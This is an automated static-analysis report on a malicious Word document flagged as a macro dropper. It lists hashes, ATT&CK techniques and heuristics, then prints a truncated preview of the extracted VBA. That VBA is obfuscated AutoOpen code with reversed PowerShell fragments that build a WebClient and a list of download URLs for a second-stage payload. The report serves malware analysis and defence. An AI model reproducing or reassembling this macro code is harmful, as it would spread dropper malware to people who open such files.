Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ca6b77c67498a94…

MALICIOUS

Office (OLE)

Size: 149.0 KB
Created: 2018-05-15 12:56:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: baf38ab32e40c570741ff6cacf6779d3
SHA-1: 845849d5069483ae31a962ad1f960df17e8f61a1
SHA-256: 1ca6b77c67498a945da6f2ecbdba33ee7fb8293f6a08f40953dc9358d8910f2a
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment; T1203 Exploitation for Client Execution

The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within the VBA macros. An Autoopen macro is present and likely initiates execution of this code when the document is opened. Together these suggest the document is designed to download and execute a second-stage payload, behaviour characteristic of dropper malware.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6545065-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6545065-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA code contains a Shell() call, which can launch an external process
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An AutoOpen macro runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered by this check and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; on its own it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 119559 bytes
SHA-256: 6714ca0f5ce83b8905f25db98de267520ccfc48a78ebd645a55267339eda7e95

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "LkViQkrkr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub rhOfD(jUSCmt)
WiDjjC = mkaYIz
ofcKUj = WKMBw
dkiTa = fwjhj + Sgn(22786 - KfGHqW - Fsoqs + Fix(36028)) - 19273 - CDbl(14470)
Trhltz = 3089
End Sub
Sub GzHTd(zvwtY)
QDWfuD = vnbHqY
PqzaiM = zAsOkb
qvtZlT = PVCrpN + Sgn(11254 - fqRvj - HwYKMK + Fix(31897)) - 5855 - CDbl(57001)
JbzEs = 64093
FEPzVz = szXhVC
ovwjwV = YISMr
hNQBaw = LqRpm + Sgn(99128 - SMmjhb - VjwVt + Fix(22410)) - 36927 - CDbl(63214)
zndMBi = 68825
HXumz = JwzjwM
iiQQM = Rfjmoi
UBInnn = QcKjhX + Sgn(3122 - YufWUa - INvpz + Fix(35127)) - 83168 - CDbl(51035)
FHDKHn = 22544
End Sub
Sub JkFGUj(ofcGlH)
KUFtv = zqKYBZ
aUrhki = NkUHod
ARpko = nziENs + Sgn(37427 - TZjEuI - UouVC + Fix(41746)) - 9220 - CDbl(50260)
zFSjzY = 39039
Nwnclm = sPquK
DtVCfc = OlHiXj
IZnwu = srwUj + Sgn(68436 - acnfK - KuLzd + Fix(33692)) - 92262 - CDbl(47923)
boEEB = 60591
End Sub
Sub Autoopen()
On Error Resume Next
ScrzE = LvAWwa
lwcYH = LwcJj
jSQKPb = XPKLoL + Sgn(22408 - jQwHV - EncMj + Fix(95384)) - 56265 - CDbl(37546)
qSKAX = 57947
rLbYzzjI (kkuODF + tvOcVOBbjuRCzX + noMvKc)
jCLcci = zjiEDA
sdKnk = fMNHSz
pYTBT = iJQzYv + Sgn(99263 - nBQJz - HuKCH + Fix(49785)) - 78368 - CDbl(99463)
oEJdS = 95955
End Sub
Sub PclMR(bdmsk)
sLwzTu = uNRut
jqbuO = hJNln
mmzTh = PpIGH + Sgn(84621 - qiODM - isKiTz + Fix(67262)) - 46049 - CDbl(51878)
WfZIY = 62662
GbjAf = tcijn
iTGAn = jcEdT
solmai = iJbHcj + Sgn(95128 - oRGlQ - AskPfl + Fix(6116)) - 85727 - CDbl(8658)
cHiIq = 35060
BAAFN = LiTqC
KwsDCs = BWvwfp
XiUwp = VJEkP + Sgn(80421 - kYlLvA - tFjEf + Fix(30194)) - 90421 - CDbl(32405)
GDUPIk = 64083
End Sub
Sub VAqWA(HnNFLc)
jAfpLR = PTZRFZ
huadzr = quKisL
QSJjoz = DpawS + Sgn(74561 - BbZQbv - tmcLlK + Fix(86307)) - 10856 - CDbl(40887)
TFSwB = 30762
End Sub

Attribute VB_Name = "RZbdFzhjEfpT"
Sub NQQBXf(XCodzU)
dNUwA = rzBUz
mufhfD = kwCpRa
iKOlz = kkDTkj + Sgn(78002 - tNPwD - smsVJZ + Fix(22731)) - 68721 - CDbl(36165)
XCVich = 71255
End Sub
Function tvOcVOBbjuRCzX()
On Error Resume Next
WRDCq = wvPdr
ntNrdv = tbXUB
cwhNJ = Mcwamj + Sgn(79754 - hYNKis - oipiBh + Fix(28766)) - 83955 - CDbl(79864)
wClOOP = 65307
nkomXi = fKiAcb
jRJIfj = nqvEYw
LiMPt = dqldU + Sgn(74628 - zmAWq - qcDsz + Fix(57615)) - 74880 - CDbl(13881)
uthwlW = 38634
iuUnbtWon = PqsUrK(".bIZ7Lej", 63406 + 2 - 63406, 63406 + 2 - 63406)
SkiLNt = fnsdiB
YOYGhI = MlGIdw
vWBjiK = lHocjX + Sgn(25690 - lJYwE - TZfpL + Fix(74157)) - 10391 - CDbl(98607)
DjzojR = 83296
zsNYn = RofQW
YElnU = msSfYL
trFfNi = PDHrGE + Sgn(25211 - jvjlc - hhckXF + Fix(56540)) - 25447 - CDbl(1220)
TBZtK = 23136
jFutS = PqsUrK("quKvB'K9;)'+'331'+'282 ,00001(t'+'xen.ds'+'ad'+'as'+'nVK9'+' ='+' BSNVK9;tneilCbe'+'W'+'.teN.metsyS )Z'+'W'+'Ut'+'cejbo-ZWU+ZW'+'UwZWU'+'+ZWUe'+'nZWU(. = UY'+'Kj", 95588 + 3 - 95588, 95588 + 154 - 95588)
SmiJV = thQVOM
znjSM = dupYO
CnXEf = NUlNw + Sgn(94583 - MkiDH - PAdUjS + Fix(12808)) - 64671 - CDbl(1945)
OcOQHS = 18583
kwAqK = Jzjhi
SaBij = ZdaiEF
UiMNIf = wLDINK + Sgn(88989 - XHNBiA - JrBzLj + Fix(70493)) - 56085 - CDbl(12289)
uGpjwl = 53387
GXFMAzo = PqsUrK("ILGz'K9 '+'='+' CDSVK9'+';'+')ZWU@ZWU(t'+'i'+'lp'+'S.ZWU/emjXq'+'Y/'+'owef/ed.ma'+'et'+'-p'+'e//:ptth@'+'/mG'+'Ko'+'z/m'+'oc.nhU.O", 42566 + 6 - 42566, 42566 + 121 - 42566)
zMGWt = ZthFT
CWjhY = MITEN
zOSDEL = WmAlof + Sgn(74517 - kaSwfJ - rXXHHb + Fix(48253)) - 36568 - CDbl(64461)
wYZfwV = 77676
wzimFZ = uKjPn
WOBGt = LzAIG
IinXb = kzkhzb + Sgn(93610 - fldsFO - TKzsaO + Fix(62190)) - 62171 - CDbl(69993)
rcdzqU = 43822
sICdTB = PqsUrK("NY%'+'mu'+'N-eciovn'+'I'+'/ten.s'3%rJS", 42665 + 6 - 42665, 42665 + 30 - 42665)
oinZpO = JGrZT
CrYoY = fBfETz
HzSppR = JRjwu + Sgn(41721 - TQIoGQ - okFISi + Fix(84161)) - 64469 - CDbl(16131)
UaCGaq = 32481
KOmkSH = jfYzT
QojwHH = GTcccn
qMmEjt = sYYsR + Sgn(44543 
... (truncated)